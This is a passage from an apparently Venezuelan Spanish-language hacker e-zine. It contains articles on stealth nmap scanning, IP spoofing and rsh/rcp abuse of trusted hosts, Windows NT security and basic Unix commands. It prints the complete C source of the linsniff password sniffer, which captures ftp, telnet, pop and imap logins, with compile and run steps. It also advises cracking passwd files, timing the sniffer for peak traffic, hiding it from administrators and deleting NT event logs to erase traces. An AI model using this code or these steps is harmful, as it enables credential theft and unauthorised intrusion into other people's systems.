     con los tipos de scan te daran muchos mas usos dependiendo de la
     aplicaci¢n asi que a practicar con nmap.
     
     
     Ahora si deseo realizar un scan muy suave para no ser detectado por 
     algun firewall utilizo estas opciones con el -f ya que algunos firewall
     poseen metodos para detectar este tipo de scan.
  

     #nmap -sF -f -p 21 23 110 143  200.12.23.34 


     DoctorX  email: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
     http://www.hackhour.com.br/hven  Hackers Venezuela
     http://bactery.8m.com  Zona de Bacterias
     "El Conocimiento es Poder"
     dudas enviarlas a mi  email y flames a /dev/null


   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  IPSpoofing & Sniffers  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹KimoÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

                             -=IPSpoofing=-

  En una red conectada a Internet el ipspoofing es un arma letal a nuestra
  disposici¢n. Un Servidor le permite a otros servidores Confiables
  comunicarse con este sin necesidad de autenticaci¢n y esto se logra al
  establecer los archivos .rhosts y otros ya en otras oportunidades
  mencionados por lo que cualquier comunicaci¢n o solicitud para usar un
  servicio (impresi¢n, manejo de bases de datos etc.) proveniente de un
  servidor que no este declarado como confiable entonces se le solicitara
  autenticaci¢n antes de realizar los enlaces de comunicaci¢n para el uso
  de los servicios o el simple acceso. Utilizando el IPspoofing un servidor
  o host no conectado a esa red se puede conectar a ella

  por  medio  de  Internet  mediante el cambio del ip del mismo por uno
  perteneciente a la red por lo que el que cambia aparentemente su ip
  suplanta a la direcci¢n ip de la red local con lo que enga¤a a los
  servidores de esa red para que no le soliciten autenticaci¢n.

  ok, Ahora como utilizamos esto ??????????
  bueno debemos recurrir a los comandos del Linux (en Windows no se puede)

  necesitamos conocer todos los servidores y hosts registrados como
  confiables en

lavictima.com

  Como lo hacemos????????
  desde el shell de Unix

ejecutas:

# arp -a

  y te dice todos los registrados en tu servidor
  y si ejecutas

# rsh lavictima.com arp -a o de esta forma

# rsh -l login lavictima.com arp -a

  claro todo esto si el sistema esta basado en BSD

  Entonces te permite ejecutar este comando sin necesidad de estar en dicho
  servidor. El comando rsh se utiliza para ejecutar comandos del shell Unix
  en un sistema remoto. Lo mejor de todo esto es que esto se realiza sin
  autenticaci¢n.

  Una vez que saben que servidores estan registrados alli utilizan un
  ipspoofer y yaaaaaaaaaaaaaaaaaa zassssssssssssss utilizas los servicios
  para lo que te de la ganaaaaaaaa!!!!!

  aunque claro tambien me podr¡a copiar los archivos y he alli el porque el
  Linux y en fin Unix son lo m ximo yo podria copiarme el inetd.conf de la
  siguiente forma

# rcp lavictima.com:inetd.conf /home/kimo/hvzone

  rcp: comando de copia remota
  rcp origen destino
  el archivo remoto se escribe "servidor:ruta del archivo"
  podr¡a copiarme el passwd jejejeje
  claro cada comando tiene sus restricciones pero eso se los dejo
  utilicen el "man" a ver lo que le sacan, esto es solo un uso pero ustedes
  podr¡an darle otros usos mas.

                -=Capturando Paquetes con un Sniffer=-
                
  Este tipo de programas son programas para monitoreo de sistemas capturan
  todas los intentos de entrada al sistema obteniendo login y password , lo
  cual es muy util para nosotros como hackers que estamos en busca de claves
  para acceder a sisrtemas, el problema es que para colocar un sniffer en un
  sistema unix debes tener acceso al shell del mismo ; previo uso de alguna
  cuenta o sea si no tenemos un login y password validos no podremos colocarlo
  en el sistema, supongamos que tienes un login y passwords tal vez es el de
  tu propia cuenta , si lo es??????

  Entonces debes sacar el passwd y tratar de crackear un par de cuentas
  utilizando un buen programa para ello como el john de ripper o el xit20,
  una vez que crackees algunos passwords entonces utilizas alguno, nunca
  utilizes tu propia cuenta para esto ya que el root del sistema puede
  revisar el log del sistema y darse cuenta de lo que sucede e indagar
  quien esta ejecutando este programa ademas de las tremendas trazas que
  deja un programa de estos en un sistema unix. Claro esto tiene su remedio
  pero eso sera otro articulo,ademas el sniffer puede ser detectado por el
  comando ps lo que lo hace mas vulnerable por lo que disponemos de muy poco
  tiempo antes de ser detectados.
 
  Lo que sugiere que ejecutemos esto un dia en el cual exista mucho trafico
  de usuario por ejemplo un lunes en la madrugada para que cuando llegen los
  usarios a las 7:00 A.M o mas tarde a ver su correo o cualquier cosa los
  atrape el sniffer y debes estar atento a recojer el botin lo mas pronto
  posible.

  Si ya tienes acceso al shell de unix en el sistema (es obvio que desde el
  inicio me he estado refiriendo a un sistema unix) entonces debes compilar
  el sniffer en el sistema tienes varias opciones subir el archivo del sniffer
  por ftp a la cuenta del huesped , entrar el shell escribir $joe sniffer.c
  [enter] y comenzar a escribirlo tu mismo lo que daria mucha ladilla!!  o
  por el contrario, si entras por telnet desde win entonces ejecutas la linea
  de comando anterior y haces un cut and paste y no tendras que escribir nada
  ni dejaras la huella de haberlo subido por ftp. Bueno ya debes tener un
  sniffer para linux o unix a la mano si no has encontrado alguno te ahorrare
  el trabajo de buscarlo, aca tienes el linsniff :

/-\/-\/-\/-\/-\/-\/-\/-\ Comienzo del Exploit - Cortar aqu¡ /-\/-\/-\/-\/-\/-\
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int openintf(char *);
int read_tcp(int);
int filter(void);
int print_header(void);
int print_data(int, char *);
char *hostlookup(unsigned long int);
void clear_victim(void);
void cleanup(int);

struct etherpacket
{
struct ethhdr eth;
struct iphdr ip;
struct tcphdr tcp;
char buff[8193];
}ep;

struct
{
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
int bytes_read;
char active;
time_t start_time;
} victim;

struct iphdr *ip;
struct tcphdr *tcp;
int s;
FILE *fp;

#define CAPTLEN 1024
#define TIMEOUT 31
#define TCPLOG "/root/private/.sniff.log"

int openintf(char *d)
{
int fd;
struct ifreq ifr;
int s;
fd=socket(AF_INET, SOCK_PACKET, htons(0x800));
if(fd < 0)
{
perror("cant get SOCK_PACKET socket");
exit(0);
}
strcpy(ifr.ifr_name, d);
s=ioctl(fd, SIOCGIFFLAGS, &ifr);
if(s < 0)
{
close(fd);
perror("cant get flags");
exit(0);
}
ifr.ifr_flags |= IFF_PROMISC;
s=ioctl(fd, SIOCSIFFLAGS, &ifr);
if(s < 0) perror("Tu mama te va a pegar Jejejejeje(modo promiscuo)");
return fd;
}

int read_tcp(int s)
{
int x;
while(1)
{
x=read(s, (struct etherpacket *)&ep, sizeof(ep));
if(x > 1)
{
if(filter()==0) continue;
x=x-54;
if(x < 1) continue;
return x;
}
}
}

int filter(void)
{
int p;
p=0;
if(ip->protocol != 6) return 0;
if(victim.active != 0)
if(victim.bytes_read > CAPTLEN)
{
fprintf(fp, "\n-----+ [CAPLEN Exceeded]+\n");
clear_victim();
return 0;
}
if(victim.active != 0)
if(time(NULL) > (victim.start_time + TIMEOUT))
{
fprintf(fp, "\n-----+ [Timed Out]+\n");
clear_victim();
return 0;
}

if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==109) p=1; /* pop2 */
if(ntohs(tcp->dest)==143) p=1; /* imap2 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
if(victim.active == 0)
if(p == 1)
if(tcp->syn == 1)
{
victim.saddr=ip->saddr;
victim.daddr=ip->daddr;
victim.active=1;
victim.sport=tcp->source;
victim.dport=tcp->dest;
victim.bytes_read=0;
victim.start_time=time(NULL);
print_header();
}
if(tcp->dest != victim.dport) return 0;
if(tcp->source != victim.sport) return 0;
if(ip->saddr != victim.saddr) return 0;
if(ip->daddr != victim.daddr) return 0;
if(tcp->rst == 1)
{
victim.active=0;
alarm(0);
fprintf(fp, "\n----- [RST]\n");
clear_victim();
return 0;
}
if(tcp->fin == 1)
{
victim.active=0;
alarm(0);
fprintf(fp, "\n----- [FIN]\n");
clear_victim();
return 0;
}
return 1;
}

int print_header(void)
{
fprintf(fp, "\n");
fprintf(fp, "%s => ", hostlookup(ip->saddr));
fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest));
}

int print_data(int datalen, char *data)
{
int i=0;
int t=0;

victim.bytes_read=victim.bytes_read+datalen;
for(i=0;i != datalen;i++)
{
if(data[i] == 13) { fprintf(fp, "\n"); t=0; }
if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}
if(t > 75) {t=0;fprintf(fp, "\n");}
}
}

main(int argc, char **argv)
{
s=openintf("eth0");
ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);
tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);
signal(SIGHUP, SIG_IGN);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
signal(SIGKILL, cleanup);
signal(SIGQUIT, cleanup);
if(argc == 2) fp=stdout;
else fp=fopen(TCPLOG, "at");
if(fp == NULL) { fprintf(stderr, "Sorry... cant open log file. gotta
create it first eg: touch %s \n",TCPLOG);exit(0);}
clear_victim();
for(;;)
{
read_tcp(s);
if(victim.active != 0)
print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);
fflush(fp);
}
}

char *hostlookup(unsigned long int in)
{
static char blah[1024];
struct in_addr i;
struct hostent *he;

i.s_addr=in;
he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);
if(he == NULL) strcpy(blah, inet_ntoa(i));
else strcpy(blah, he->h_name);
return blah;
}

void clear_victim(void)
{
victim.saddr=0;
victim.daddr=0;
victim.sport=0;
victim.dport=0;
victim.active=0;
victim.bytes_read=0;
victim.start_time=0;
}

void cleanup(int sig)
{
fprintf(fp, "Awww.... that hurts!....\n");
close(s);
fclose(fp);
exit(0);
}
/-\/-\/-\/-\/-\/-\/-\/-\ Fin del Exploit - Cortar aqu¡ /-\/-\/-\/-\/-\/-\/-\/\

  Para compilar el sniffer : gcc -o linsniff linsniff.c
  para ejecutarlo: touch /root/private/.sniff.log
  ./linsniff &
  tail -f /root/private/.sniff.log

  De esta manera el sniffer esta capturando todos los paquetes que pasen a
  traves de cierta interfase y asi podra capturar muchos logins y passwords,
  claro esta no es la unica forma de obtenerlos pero queda de parte de cada
  quien el trabajar mas para obterner otros tipos de acceso y encontrar otras
  vulnerabilidades. Para el uso del sniffer necesitan corregir los puertos
  sobre los cuales capturara el paquete por los que esten disponbles en mi
  caso en la linea 119 debi colocar imap en reenplazo de imap2 y 25 en vez de
  143 en el numero de puerto, ademas deben crear un directorio en el cual
  el sniffer va a dejar su huella de paquetes capturados podria ser un
  directorio nuevo como el private pero no en el directorio root ya que si
  aun no eres root como lo podrias leer ? por lo que debes crear un nuevo
  directorio en tu propio home(aunque seria suicidio) o creas el directorio
  en otro sitio alejado de la atencion de el administrador del sistema(root).

  Otros sniffer son : 

  * Etherfind para SunOs4.1.x
  * Snoop para Solaris 2.x y SunOs 4.1 (disponible en ftp playground.sun.com)
  * Tcpdump 3.0 uses bpf compatible con muchas plataformas.
  * Packetman, Interman, Etherman, Loadman estos funcionan en las siguientes
  plataformas:
  SunOS, Dec-Mips, SGI, Alpha, and Solaris. Estan disponibles en 
  ftp.cs.curtin.edu.au:/pub/netman/[sun4c|dec-mips|sgi|alpha|solaris2]
  /[etherman-1.1a|interman-1.1|loadman-1.0|packetman-1.1].tar.Z
  Packetman fue dise¤ado para capturar paquetes, mientras que Interman,
  Etherman,y Loadman fueron dise¤ados para monitrear el trafico.
  *sniffit

Nota : las direcciones de ubicacion de los sniffer fue tomada de un articulo
publicado por Internet Security Sistems I.n.c .

                                                        
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  Seguridad en Windows NT  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹KliberÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

                              -=Introducci¢n=-

  Mucho se ha hablado de Windows y su seguridad, muchos colegas de la
  comunidad hack ridiculizan el uso de Windows y alegan que Unix si es en
  realidad un sistema Operativo; la verdad es que, Windows gana terreno
  rapidamente y se esta convirtiendo en un Standard en la red, por lo tanto
  no debemos reirnos de Bill Gates si no darle un estudio serio a este
  Sistema Operativo.

  Los problemas de seguridad en Windows pueden resumirse en dos palabaras:
  "Interfaz Amigable" o facilidad de uso. Ninguna otra plataforma ha sido
  dise¤ada expresamente para este proposito, ni siquiera Mac. Esta facilidad
  de uso viene con un Costo en materia de seguridad. Ahora bien, Windows NT
  tiene un modelo de seguridad bastante bueno, el elemento mas importante de
  ese modelo concierne al "Control de Acceso". El control de acceso es una
  forma de seguridad comunmente vista en los Sistemas Operativos basados en
  Unix, y tiene que ver con el control de quien puede accesar a archivos,
  directorios, y servicios. En ciertos casos, incluso a que horas este acceso
  puede ocurrir.

  La seguridad en Windows NT aunque algo compleja, se basa en dos cosas muy
  Simples:

  @ Restringir el Acceso a Objetos(*) tales como recursos del sistema,
  Archivos, Servicios, Dispositivos, etc.

  @ El Servicio de Auditoria que genera entradas en un Registro o "Log" del
  sistema al operar sobre un Objeto(*)


[(*) Windows NT es un Sistema operativo con dise¤o orientado a objetos, La
mayoria del sistema operativo esta concebido como Objeto: Archivos, memoria,
dispositivos, procesos, etc. El sistema de seguridad de Windwos NT comprueba
todos los accesos a estos objetos, comprueba que son utilizados los permisos
apropiados y el sistema de auditoria de Windows NT registra estos sucesos.]


  Por lo tanto tenemos que la seguridad de Windows NT la podemos resumir en
  Control de acceso a Objetos, y monitoreo del sistema. Eso es la base del
  sistema  de  seguridad de NT, que utiliza  controles de  accesos
  "Discrecionales" que permite saber que usuarios acceden a que servicios
  u objetos; como ya sabemos, los objetos en NT pueden ser Archivos, Puertos,
  Directorios, etc. Cada objeto puede ser protegido individualmente o por
  Grupos, esto quiere decir, que un usuario cuando le es creada la cuenta
  se le asigna una cantidad de derechos y permisos especificos, y a su vez,
  este es incluido en un "Grupo" de trabajo, entonces tenemos permisos
  Individuales y Grupales, de repente este usuario puede tener mas derechos
  y permisos por pertenecer a un grupo que los que le son asignados
  individualmente.

  Cualquier usuario que quiera acceder a un sistema NT deberia tener una
  cuenta de usuario en ese sistema (un login y un password). Los grupos son
  conjuntos de usuarios con permisos especificos para la actividad que
  realizan, por ejemplo, el Grupo "Administradores" no puede tener los mismos
  permisos y derechos que el grupo "Todos", es mas facil para un administrador
  asignar permisos a un grupo que hacerlo individualmente, por lo tanto,
  debemos tener en cuenta a los grupos cuando estudiemos la seguridad de
  un sistema.

  Grupos Principales en un Entorno NT:

  # Administradores: Son los usuarios que tienen los derechos para administrar
  el sistema y hacer lo que les da la gana con ellos, es el equivalente a
  Root en Unix.

  # Operadores de Cuentas: los que tienen derechos para administrar, crear,
  borrar, cuentas de usuario.

  # Operadores de Impresi¢n: Son los que tienen derecho a administrar
  impresoras.

  # Usuarios: Son los usuarios comunes y silvestres, con los derechos normales
  en una cuenta de usuario.

  # Invitados: Usuarios sin cuenta con derechos bastante limitados, unos
  simples lamers. jeje!


  Windows NT tiene algunas caracter¡sticas de seguridad que tenemos que
  conocer, poco a poco iremos estudiando estas caracter¡sticas para tener
  una idea clara del conjunto de medidas de seguridad de Windows NT.

                          -=El Inicio de Sesi¢n=-

  Windows NT es Diferente a otras versiones de Windows en muchos aspectos,
  cuando se carga carga el sistema operativo, NT se prepara para el inicio
  de la sesi¢n, mediante un dialog box indicando que se pulsen las teclas
  Crtl-Alt-Del y presentando un cuadro para el login y password, este inicio
  de sesion protege tambien contra los caballos de troya, esta secuencia
  asegura que se iniciara una nueva secuencia de inicio de sesi¢n (valgase la
  Rebuznancia); cuando un usuario inicia una sesi¢n en NT, escribe su nombre
  de usuario y su contrase¤a, la proxima vez que alguien inicie una sesion en
  el sistema, el ultimo nombre escrito en ese campo aparecer  escrito
  nuevamente, esto es un problema de seguridad potencial que viene por defecto
  en las maquinas NT, para eliminar este problema, usamos el registro de NT:

  1) Vamos a INICIO -> Ejecutar -> Colocamos REGDT32 en el dialog box.

  2) Al aparecer el editor del registro, hacemos click en HKEY_LOCAL_MACHINE.

  3) Luego buscamos la siguiente localizaci¢n:
  SOFTWARE/Microsoft/Windows NT/Current Version/Winlogon

  4) En la ventana derecha del registro hacemos doble click en la opci¢n
  "DontDisplayLastUserName" y cambiamos el valor a 1 para desactivarlo.

  5) No hay paso cinco. jeje!

  Muy bien, habiamos quedado en el inicio de sesion, recordemos que este
  inicio de sesion esta representado por un cuadro de dialogo o "Dialog Box"
  con casillas para el ID y el Password (Desafio); un buen Administrador
  haria de este "Desafio" algo mas Interesante a modo de proteccion
  psicologica-esoterica, colocando un Texto a manera de "Aviso Legal"
  bastante intimidatorio como para evitar que Lamers jueguen con la estacion;
  Algo como esto quiza:

  AVISO:

  "Esta Es la estaci¢n de Auditoria de la Red, su uso esta Restringido al
  Grupo "Auditores", todos los inicios de sesi¢n en esta maquina seran
  monitoreados. 
  En caso de uso Indebido de este equipo se aplicaran sanciones Penales segun
  Art. 125 de la Ley de Telecomunicaciones Digitales (PANATEL) Blah blah bla.

  ...O una amenaza en "H4X0R" todo lo satanica y vulgar que quieras, o una
  maldici¢n gitana o tal vez un Pasaje de la Biblia... (cada quien tiene
  sus gustos..). :)

  Para hacerlo utilizamos el Registro nuevamente:

  1) Repetimos los pasos anteriores hasta el Paso 3 (buscamos Winlogon en el
  registro).

  2) En la ventanita derecha del Registro hacemos doble Click en la opcion
  "LegalNotice-caption". Aqui colocamos el Titulo del Dialog Box (Nombre
  siniestro de la Estaci¢n) B-]

  3) Haz doble click en la opci¢n "LegalNoticeText" y coloca el Texto que
  quieras...

  Monitor de Actividades, Auditoria (Visor de Sucesos)

  Pues bien, una vez conectado a un NT mucho de lo que hagas durante la
  sesion (Este "Mucho" depende de la configuraci¢n del mismo) va a parar a
  unos Archivos de registro, estos archivos son creados en el "Visor de
  Sucesos" de Windows NT, esta herramienta es sumamente util para monitorear
  lo que sucede en una estacion, puede ser configurada para activarse ante
  casi cualquier movimiento dentro del sistema: Inicio y cierre de sesion,
  acceso a archivos y objetos, uso de los derechos de usuario, administracion
  de usuario y grupos, Cambios en el plan de seguridad, Reinicio y apagado del
  sistema , seguimiento de procesos...

  Desde que se inicia la sesion, esta es monitoriada, claro, en una red con
  muchos usuarios, las opciones de monitoreo son mas reducidas debido a que
  generan muchos bytes de informacion, y esto no es de mucha utilidad, casi
  siempre los administradores, usan la auditoria de procesos a full capacidad
  cuando sospechan que esta pasando algo "raro" con los servidores, este
  sistema de seguridad es muy util para descubrir Virus o archivos que hayan
  sido colocados aleatoriamente, tales como troyanos o BackDoors..., toda esa
  Info va a parar a estos Archivitos que los podemos encontrar en:

  systemroot/System32/CONFIG

  Y aqui los identificamos:

  # SECEVENT.EVT [ Registro de Sucesos de Seguridad ]

  # SYSEVENT.EVT [ " " del Sistema ]

  # APPEVENT.EVT [ " " en Aplicaciones ]

  Si estos Archivos no estan correctamente configurados, pueden ser
  manipulados, o (lo que es mas comun) simplemente eliminados para borrar
  las huellas de una amena estadia, estos Archivos se volveran a crear y
  el sistema empezara a monitorear nuevamente (Claro, los eventos y sucesos
  que ocurrieron antes de su destruccion quedar n en el Olvido).. B-]
 

   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  UNIX, Como usarlo y vivir para contarlo...  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹KliberÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

  Ok, Unix o tambi‚n conocido como *NIX debido a todos sus sabores o
  versiones, no es mas que un sistema operativo...(al igual que Windoze
  y Dos), sip, tan solo eso, es la forma como los humanos se comunican con
  las computadoras... Nosotros los Humanos no podemos hablar en codigo
  binario (el idioma de las computadoras 1.0.1.1.0.0 ), asi que la funci¢n
  de los SO es la de transformar los comandos que tipeamos en 1s y en 0s,
  Windows fu‚ dise¤ado para ser facil de utilizar, Unix fu‚ dise¤ado para
  ser Poderoso..., Windows fu‚ hecho para un solo usuario, Unix fu‚ hecho
  para muchos, Unix es multitarea (al igual que Windoze) Unix puede tener
  varios usuarios y trabajar en varios procesos a la vez, no todos los
  programas para Unix se ejecutan bajo ventanas (aunque tiene tambi‚n una
  interf z como la de windows llamada x-windows), Unix trabaja mas que todo
  con lineas de comandos... (como en MS-DOS).

  Tu puedes ver que procesos se est n ejecutando en unix (como cuando le
  das crt-alt-del en Windows), tu puedes tener una simple PC con Unix
  cargado y tener a cientos de usuarios conectados a la vez.. (cosa
  dificil con windoze), eso es lo que conocemos como una cuenta Shell,
  muchas personas conectadas a una m quina...

  El Shell de Unix no es mas que el Prompt del sistema operativo, desde el
  cual tipieamos los comandos, puede tener muchas apariencias pero la mas
  com£n es esta:

  #

  o esta:

  DarkStar:/home/usr/kliber#

  (Hmm... diferente a c:> no?)

  --------
  Comandos:
  --------

  man
  ---
  Este comando significa: "Manual", es como la "Ayuda" de Windows, si
  queremos saber algo sobre un comando o programa solo debemos tipear:

  man Nombre del comando o programa.

  Por ejemplo, has escuchado hablar sobre el comando "ls", pero no tienes
  idea para que sirve, o como se utiliza, bueno, solo tienes que hacer esto:

  man ls

  Nota: Por lo general (y esto se va a convertir en una constante), esta
  "ayuda" te va a venir en INGLES, (lo siento), asi que vamos a ponernos
  pilas con ese idioma co¤o!!

  y veremos algo como esto:

  LS(1V) USER COMMANDS LS(1V) NAME ls - list the contents of a directory
  SYNOPSIS ls [ -aAcCdfFgilLqrRstu1 ] filename ... SYSTEM V SYNOPSIS
  /usr/5bin/ls [ -abcCdfFgilLmnopqrRstux ] filename ... AVAILABILITY The
  System V version of this command is available with the System V software
  installation option. Refer to Installing SunOS 4.1 for information on how
  to install optional software.

  (Hmmm... no se ve nuy bonito pero nos da una idea rudimentaria de lo que
  es...)

  cd
  --

  Aja, adivinaron, este comando (al igual que en Ms-dos) nos sirve para
  cambiar de directorio, ejm:

  cd /usr/bin

  Este comando te llevar  al directorio "Bin", (notese que los Slash se usan
  de forma diferente que en ms-dos).

  ls
  --

  Este comando nos muestra que hay en un directorio, (es el equivalente a dir
  en ms-dos), este y otros muchos comandos, pueden ejecutarse con "variables",
  estas variables, nos permiten ejecutar los comandos en la forma que a
  nosotros mas nos convenga... :) ejm:
 
  #ls

  Al ejecutar este comando, nos dar  una lista de los archivos que est n en
  el directorio actual...,

  koan% ls public_html tmp koan%

  Como pueden ver, el directorio actual consta de 2 archivos, ahora bien,
  que pasar¡a si ejecutamos este mismo comando junto con algunas variables..:

  #ls -alf

koan% ls -alf
total 15
drwxr-xr-x 4 root wheel 512 Sep 23 16:57 .
drwxr-xr-x 8 root wheel 512 Sep 22 10:58 ..
-rw-r--r-- 1 root wheel 1108 Sep 28 20:09 .login
-rw-r--r-- 1 root wheel 139 Sep 22 10:58 .login_conf
-rw-r--r-- 1 root wheel 313 Sep 22 10:58 .mailrc
-rw-r--r-- 1 root wheel 749 Sep 22 10:58 .profile
-rw-r--r-- 1 root wheel 832 Sep 22 10:58 .shrc
-rw------- 1 root wheel 351 Sep 22 10:58 .mail_aliases
-rw-r--r-- 1 root wheel 540 Sep 22 11:04 .cshrc
drwxrwxrwt 14 root wheel 1536 Nov 6 20:50 tmp
-rw-r--r-- 1 root wheel 0 Sep 23 16:51 .bash_history
-rw------- 1 root wheel 257 Sep 22 10:58 .rhosts
-rw-rw--w- 1 root wheel 69 Nov 6 20:44 .history
drwxrwxrwt 8 root wheel 512 Nov 6 20:25 public_html koan%

  Al ver este directorio, podran darse cuenta de que es "algo" diferente de
  los directorios que estamos acostumbrados a ver en ms-dos, ese es un
  directorio de Unix, y veremos que significa toda esa informaci¢n...


drwxrwxrwt 14 root wheel 1536 Nov 6 20:50 tmp
-rw-r--r-x 1 root wheel 0 Sep 23 16:51 .bash_history

  drwxrwxrwx: Estos son los permisos, estan divididos en tres grupos de tres
  letras cada grupo, la primera letra, si es la letra "d" nos dice que se
  trata de un directorio, si es un "-" se trata de un archivo, asi podemos
  identificar cuales son archivos y cuales son directorios...

  rwx: Estos son los permisos de archivos o directorios, r: significa leer,
  w: significa modificar, x: significa ejecutar, como dije estan divididos
  en tres grupos, el primer grupo pertenece al due¤o del archivo o directorio,
  el segundo pertenece a los miembros del Grupo, y el tercero es el resto de
  los usuarios... ¨que quiere decir todo esto? bueno, se los explicar‚ con
  este ejemplo:

  -rwxr--r-- Bien, viendo estos permisos, lo primero es que identificamos que
  estamos tratando con un archivo (-) el due¤o del archivo puede leerlo (r)
  borrarlo o sobreescribirlo (w) y ejecutarlo (x) , los miembros del grupo al
  que pertenece el due¤o del archivo solo pueden leerlo (r--) (vean que falta
  la w y la x) y el resto de los usuarios tambien solo pueden leerlo (r--)

-rw-r--r-- 1 mac_x wheel 1147 Sep 29 19:42 bashh.c

  Ahora bien de izquierda a derecha, tenemos los permisos de este archivo
  (porque lo primerito que hay es un "-" y esto quiere decir que estamos
  viendo un archivo, luego tenemos el nombre del due¤o de este archivo
  (mac_x) luego tenemos el nombre del grupo al que pertenece el due¤o del
  archivo (wheel), luego el tama¤o del archivo (1147) la fecha y hora en que
  fu‚ creado o modificado (Sep 29 19:42) y por ultimo y muy importante, el
  nombre del archivo... (bashh.c).
 
  De nuevo otro directorio para que vayan familiarizandose:


drwxr-xr-x 2 guest wheel 512 Nov 5 17:03
.theme drwxr-xr-x 2 guest wheel 512 Nov 6 21:02 wow
-rw-r--r-- 1 mac_x wheel 1147 Sep 29 19:42 bashh.c
-rw-r--r-- 1 guest wheel 1320 Nov 6 20:49 termcap
-rw------- 1 guest wheel 0 Nov 6 19:08 vi.D23167
-rw------- 1 guest wheel 0 Nov 6 19:09 vi.L23169
drwxr-xr-x 2 guest wheel 512 Nov 6 14:55 .tmp
-rws--x--x 3 root users 147456 Sep 15 16:40 aa
-rw-r--r-- 1 guest wheel 37 Nov 6 01:04 .pswd
drwxr-xr-x 2 guest wheel 512 Nov 5 14:26 .bfg
-rwxr-x--- 7 cmeinel cmeinel 286720 Jul 25 02:36 irc12
-r-sr-xr-- 4 root users 32768 Sep 17 15:03 foo
-rwxr-x--- 7 cmeinel cmeinel 286720 Jul 25 02:36 irc3
drwxr-xr-x 2 guest wheel 512 Nov 6 03:30 .Yak
drwxr-xr-x 2 guest wheel 512 Nov 3 19:44 .x
drwxr-xr-x 2 guest wheel 512 Nov 1 15:47 .loop
drwxr-xr-x 2 guest wheel 512 Nov 3 17:56 .moo

  Debemos resaltar que Unix trata a todos los archivo como si fueran de texto,
  esto quiere decir que no poseen extensi¢n (como en ms-dos), ni son
  ejecutables desde el Shell a menos que se "Monten" como por ejemplo
  con:

#crontab exploit.c

  Otra cosa que hay que destacar, es que en Unix, no importa el tama¤o del
  nombre del archivo, puede existir un archivo que se llame:

  el_archivo_mas_tonto_del_mundo_leeanlo_ya!.txt.exe.com_no_importa

  who:
  ----

  Nos dice quien est  conectado a la estaci¢n en ese momento y que diablos
  est  haciendo...

#w (facilito)

  date:
  -----

  Muestra la fecha y hora... (ugh!)

  cal:
  ----

  Un autentico calendario UNIX para poder planear tus Hackings del mes... :)

  #cal 11 1998

  rm:
  --

  Borra un archivo.. (ojo: *nix no es como windoze, *nix no pregunta antes
  de borrar un archivo, asi que cuidado,un vez borrado... chao!)

#rm nombre del archivo

  rmdir:
  -----

  Borra un directorio, este debe de estar vacio....

  cat:
  ----

  Este comando es super-util, nos sirve para leer el contenido de un y lo
  envia al dispositivo de salida standard, (pantalla) , (no recomiendo leer
  archivos binarios con este comando) :) para saber cual es cual tenemos la
  orden: file , que nos dir  que es binario y que no... tambi‚n podemos crear
  un archivo de texto con cat, redireccionando la salida hacia un archivo...
  (hablaremos de redirecciones y otros menesteres mas adelante) por ejemplo:
  cat > archivo todo lo que tecleemos ir  a parar a un archivo... Podemos
  hacer muchas cosas en Unix, as¡ que no se enreden, poco a poco...

#cat exploit.c mostrar  el contenido de el archivo en pantalla.

  write:
  ------

  manda un mensaje a otro usuario por pantalla, ejm:

#write merlin Hola merlin, no puedo accesar al directorio etc/passwd,
¨sabes como hacerlo?

  El usuario merlin ver  en pantalla:

Message from kliber tty0 [fry nov 12 23:30] Hola merlin..... (etc.)

  talk:
  -----

  Es el Chat de Unix, con este comando pueden comunicarse dos usuarios
  tecleando sus ideas... (como en un Chat), cuando lanzamos esta orden,
  se divide la pantalla en dos partes y si se establece la comunicaci¢n,
  podremos hablar tranquilamente sobre como Hackear ese servidor... :)


  mesg:
  -----

  Si no utilizan esta orden primero, ni van a poder recibir mensajes, ni van
  a poder chatear, asi que cuando entren al shell pongan: mesg yes (a veces
  esto varia, pero si no funciona as¡, pongan solo mesg para ver la sintaxis)

  pwd:
  ----

  Muestra el directorio actual...

  whoami:
  -------

  Indica que usuario eres...

  finger:
  -------

  indica informaci¢n sobre un usuario determinado...

  wall:
  -----

  Manda un mensaje a todos los usuarios conectados...

  Exploremos un poco acerca de los Permisos de Archivo,
  (File Permissions), esto fu‚ una gran idea de los creadores de Unix, que
